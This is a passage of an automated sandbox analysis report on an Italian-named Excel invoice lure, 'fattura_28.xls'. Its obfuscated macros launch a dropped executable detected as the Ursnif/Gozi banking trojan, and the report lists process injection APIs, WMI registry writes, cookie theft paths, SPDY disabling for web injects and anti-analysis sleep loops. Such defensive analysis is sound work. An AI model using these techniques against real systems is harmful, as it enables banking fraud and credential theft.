Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000002.00000003.1275041455.055C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.1297996198.055F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000003.1273363449.05F3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: sodxnes.exe PID: 2164, type: MEMORY

E-Banking Fraud:

barindex
Detected Gozi e-Banking trojanShow sources
Source: C:\ProgramData\sodxnes.exeCode function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ff2_2_05601B0F
Source: C:\ProgramData\sodxnes.exeCode function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ie2_2_05601B0F
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000002.00000003.1275041455.055C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.1297996198.055F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000003.1273363449.05F3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: sodxnes.exe PID: 2164, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)Show sources
Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

barindex
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: fattura_28.xlsInitial sample: CALL
Source: fattura_28.xlsInitial sample: CALL
Found obfuscated Excel 4.0 MacroShow sources
Source: fattura_28.xlsInitial sample: High usage of CHAR() function: 149
Writes or reads registry keys via WMIShow sources
Source: C:\ProgramData\sodxnes.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::GetBinaryValue
Source: C:\ProgramData\sodxnes.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\ProgramData\sodxnes.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\ProgramData\sodxnes.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\ProgramData\sodxnes.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\ProgramData\sodxnes.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\ProgramData\sodxnes.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::CreateKey
Source: C:\ProgramData\sodxnes.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\ProgramData\sodxnes.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::GetBinaryValue
Source: C:\ProgramData\sodxnes.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\ProgramData\sodxnes.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\ProgramData\sodxnes.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Writes registry values via WMIShow sources
Source: C:\ProgramData\sodxnes.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\ProgramData\sodxnes.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\ProgramData\sodxnes.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\ProgramData\sodxnes.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\ProgramData\sodxnes.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\ProgramData\sodxnes.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\ProgramData\sodxnes.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\ProgramData\sodxnes.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\ProgramData\sodxnes.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Contains functionality to call native functionsShow sources
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_00401360 GetProcAddress,NtCreateSection,memset,2_2_00401360
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_00401FF6 KiUserExceptionDispatcher,GetLastError,NtClose,2_2_00401FF6
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_004020BE NtMapViewOfSection,2_2_004020BE
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_00226CD0 NtCreateSection,memset,2_2_00226CD0
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_00221531 memcpy,memset,GetModuleHandleA,GetProcAddress,GetLastError,HeapFree,NtClose,2_2_00221531
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_00223B04 NtMapViewOfSection,2_2_00223B04
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_00223DCC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_00223DCC
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_055F8D84 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,2_2_055F8D84
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_0560CF5E NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_0560CF5E
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_05609625 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_05609625
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_055FEE8C LdrLoadDll,LdrGetProcedureAddress,NtProtectVirtualMemory,GetModuleHandleA,memcpy,2_2_055FEE8C
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_0560D975 memset,memcpy,NtSetContextThread,NtSetContextThread,RtlNtStatusToDosError,GetLastError,2_2_0560D975
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_055FF000 NtMapViewOfSection,2_2_055FF000
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_0560D89A NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_0560D89A
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_055F3272 GetProcAddress,NtCreateSection,memset,2_2_055F3272
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_055F3A19 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,2_2_055F3A19
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_056062E7 NtReadVirtualMemory,NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_056062E7
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_055FC585 NtQuerySystemInformation,RtlNtStatusToDosError,2_2_055FC585
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_05605E3C NtGetContextThread,RtlNtStatusToDosError,2_2_05605E3C
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_0560C9B3 CreateEventA,WaitForSingleObject,DisconnectNamedPipe,ConnectNamedPipe,GetLastError,WaitForMultipleObjects,FlushFileBuffers,DisconnectNamedPipe,WaitForSingleObject,CloseHandle,GetLastError,CloseHandle,RtlExitUserThread,NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,2_2_0560C9B3
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_055F587E NtQueryInformationProcess,2_2_055F587E
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_055FEA7F memset,NtQueryInformationProcess,2_2_055FEA7F
Contains functionality to launch a process as a different userShow sources
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_05606920 CreateProcessAsUserA,2_2_05606920
Detected potential crypto functionShow sources
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_002243172_2_00224317
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_0022A96C2_2_0022A96C
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_002261CC2_2_002261CC
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_0041164B2_2_0041164B
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_00416E662_2_00416E66
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_0041827A2_2_0041827A
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_00411E052_2_00411E05
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_00410E182_2_00410E18
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_00411A1D2_2_00411A1D
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_00412A3C2_2_00412A3C
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_004112AD2_2_004112AD
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_004169152_2_00416915
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_004163C42_2_004163C4
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_055F6F172_2_055F6F17
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_056076C22_2_056076C2
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_056109842_2_05610984
Classification labelShow sources
Source: classification engineClassification label: mal100.phis.bank.troj.spyw.expl.evad.winXLS@19/56@10/4
Contains functionality to enum processes or threadsShow sources
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_055FA382 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,2_2_055FA382
Contains functionality to instantiate COM classesShow sources
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_002260A2 CoCreateInstance,CoSetProxyBlanket,2_2_002260A2
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$fattura_28.xlsJump to behavior
Creates mutexesShow sources
Source: C:\ProgramData\sodxnes.exeMutant created: \Sessions\1\BaseNamedObjects\{93034449-D6B3-3D59-7877-6AC12C9B3E85}
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDAE3.tmpJump to behavior
Document contains an OLE Workbook stream indicating a Microsoft Excel fileShow sources
Source: fattura_28.xlsOLE indicator, Workbook stream: true
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\ProgramData\sodxnes.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample might require command line argumentsShow sources
Source: sodxnes.exeString found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\ProgramData\sodxnes.exe 'C:\ProgramData\sodxnes.exe'
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Windows\System32\ie4uinit.exe 'C:\Windows\System32\ie4uinit.exe' -ShowQLIcon
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2120 CREDAT:275457 /prefetch:2
Source: unknownProcess created: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe 'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2412 CREDAT:275457 /prefetch:2
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2792 CREDAT:275457 /prefetch:2
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3092 CREDAT:275457 /prefetch:2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\ProgramData\sodxnes.exe 'C:\ProgramData\sodxnes.exe' Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Windows\System32\ie4uinit.exe 'C:\Windows\System32\ie4uinit.exe' -ShowQLIconJump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2120 CREDAT:275457 /prefetch:2Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe 'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -newJump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2412 CREDAT:275457 /prefetch:2Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2792 CREDAT:275457 /prefetch:2Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3092 CREDAT:275457 /prefetch:2
Uses an in-process (OLE) Automation serverShow sources
Source: C:\ProgramData\sodxnes.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Writes ini filesShow sources
Source: C:\Windows\System32\ie4uinit.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Document has a 'vbamacros' value indicative of goodwareShow sources
Source: fattura_28.xlsInitial sample: OLE indicators vbamacros = False
Document has an 'encrypted' value indicative of goodwareShow sources
Source: fattura_28.xlsInitial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)Show sources
Source: C:\ProgramData\sodxnes.exeUnpacked PE file: 2.2.sodxnes.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
Detected unpacking (overwrites its own PE header)Show sources
Source: C:\ProgramData\sodxnes.exeUnpacked PE file: 2.2.sodxnes.exe.400000.0.unpack
Contains functionality to dynamically determine API callsShow sources
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_05609C37 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,2_2_05609C37
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_0022A95B push ecx; ret 2_2_0022A96B
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_0022A5A0 push ecx; ret 2_2_0022A5A9
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_0026E819 push eax; iretd 2_2_0026E81F
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_0026FA48 push es; iretd 2_2_0026FA53
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_0026FCBE push cs; ret 2_2_0026FCBF
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_0026A689 push ebx; retf 2_2_0026A77F
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_0026A689 push esi; iretd 2_2_0026A7F1
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_0026A705 push ebx; retf 2_2_0026A77F
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_0026EB5E push edx; iretd 2_2_0026EB62
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_00269B80 push es; ret 2_2_00269B87
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_0026A780 push ebx; retf 2_2_0026A77F
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_0026A78F push esi; iretd 2_2_0026A7F1
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_05610470 push ecx; ret 2_2_05610479
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_05610973 push ecx; ret 2_2_05610983

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000002.00000003.1275041455.055C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.1297996198.055F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000003.1273363449.05F3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: sodxnes.exe PID: 2164, type: MEMORY
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\sodxnes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\sodxnes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\ie4uinit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\ie4uinit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\ie4uinit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\ie4uinit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\ie4uinit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\ProgramData\sodxnes.exeWindow / User API: threadDelayed 771Jump to behavior
Found evasive API chain (date check)Show sources
Source: C:\ProgramData\sodxnes.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found evasive API chain checking for process token informationShow sources
Source: C:\ProgramData\sodxnes.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\ProgramData\sodxnes.exe TID: 2212Thread sleep count: 771 > 30Jump to behavior
Source: C:\ProgramData\sodxnes.exe TID: 2212Thread sleep time: -46260000s >= -30000sJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_00225632 memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_00225632
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_05606656 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_05606656
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_055F284E FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_055F284E
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_0560DB2F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_0560DB2F
